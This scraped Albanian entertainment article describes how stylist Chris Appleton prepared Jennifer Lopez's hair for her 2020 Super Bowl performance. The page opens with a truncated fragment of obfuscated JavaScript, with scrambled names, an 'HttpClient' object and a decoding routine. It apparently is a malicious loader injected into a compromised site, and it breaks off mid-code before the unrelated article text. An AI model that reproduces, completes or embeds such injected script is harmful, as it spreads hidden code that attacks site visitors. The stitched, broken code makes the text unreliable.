;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Si arriti Jennifer Lopez të ketë flokë të përsosura kur performoi në Super Bowl?

By

”Flokët janë të një rëndësie të madhe, për të paraqitur veten, veçanërisht në skenë”, është shprehur njeriu që qëndron prapa paraqitjes së  Jennifer Lopez në Super Bowl 2020, javën që e lëm pas.

Chris Appleton, ka thënë se e gjitha qe një sfidë, pasi rezultati i tërë paraqitjes perfekte të  Jennifer Lopez në skenë, ishte një javë e pandalshme përplot prova.

“Kishim kënaqësi duke provuar pamje të ndryshme”, thotë Chris, i cili ka qenë në Florida të Jugut gjatë gjithë javës duke u përgatitur me Lopez.

Ndërsa Appleton normalisht përgatiti flokët e superyllit për një performancë dy-orëshe – duke marrë në konsideratë djersën, makinat e erës dhe krhërit e ndryshëm –  ai ka shtuar se atë natë kishte një shtresë shtesë të ndërlikimeve: lagështia.

“Miami është vendi më i keq për flokët”, bën shaka Appleton për lagështinë dhe indeksin e nxehtësisë të qëndrueshme të qytetit.

“Sado e lehtë të duket, është shumë planifikim për t’u siguruar që flokët të lëvizin drejt në ato gjashtë minuta të rëndësishme”.

Gjithçka u përdor për rregullimin e flokëve të Jennifer Lopez! 

Stilisti i Jennifer Lopez, ka treguar disa hapa se si arriti të sjellë një pamje mahnitëse të Jennifer Lopez.

Ai thekson që ‘’kaçurrelat në formë, janë e gjithë ajo që i duhen’’ dhe për këtë Appleton pohon se fillimisht ka përdorur hekur më të vogël për t’ju dhënë formë flokëve, e më pas ka përdorur elemente të tjera.

E gjihë kjo për të arritur një formë dinamike të flokëve, ku përfundimisht ai iu vendos atyre kapëse në rrënjë, e pastaj në gjithë kokën vepron me ajër të freskët nga një tharëse.

Artikuj të ngjashëm